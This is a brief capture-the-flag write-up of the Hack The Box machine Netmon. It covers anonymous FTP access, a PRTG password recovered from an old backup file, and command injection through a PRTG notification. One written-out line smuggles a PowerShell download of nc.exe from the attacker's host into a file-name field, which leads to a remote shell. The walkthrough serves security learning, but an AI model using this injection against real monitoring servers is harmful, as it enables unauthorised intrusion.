Hello Again, Netmon is windows machine from hackthebox. I enjoyed getting root of this machine as it required little extra out of box thinking. Let’s start the dirty work,the IP of machine is 10.10.10.152.
Scanning with Nmap: nmap -sV 10.10.10.152
As we can see on port 21, Anonymous login is allowed. So let’s play with FTP.
After googling about PRTG configuration file,I found the locations as
%programdata%\Paessler\PRTG Network Monitor
After looking through the files,I found password in PRTG Configuration.old.bak and if you can see, the database isn’t updated from a long back,i.e. 2018. So the password in 2018 was with the same year number, it’s 2019 so I changed the password to same year.
Tadda!! I logged in.
After visiting the profile section, I tried to add new notification.
Let me create a new notification with the name testMB
I gave a random file name and tried to copy the root.txt file to a new file which is minions.txt and as the cruse of pentest follows, I was unable to copy the root flag.(took 20-30 attempts)
I returned to the swiss army knife and tried this time with nc.exe.
Again I edited the execute Program and tried too transfer nc.exe from my kali to target.
test.txt; Invoke-WebRequest http://10.10.14.9:8000/nc.exe -OutFile c:\Users\Public\Downloads\nc.exe
Let’s check whether nc is transferred or not.
Woooshh!! Finally, something good happened. Let’s try to execute nc and start nc listener on kali.
Well this worked and finally, after the plethora of trail, I got shell with root.txt.
Visit:Cosmicskills AzureSkynet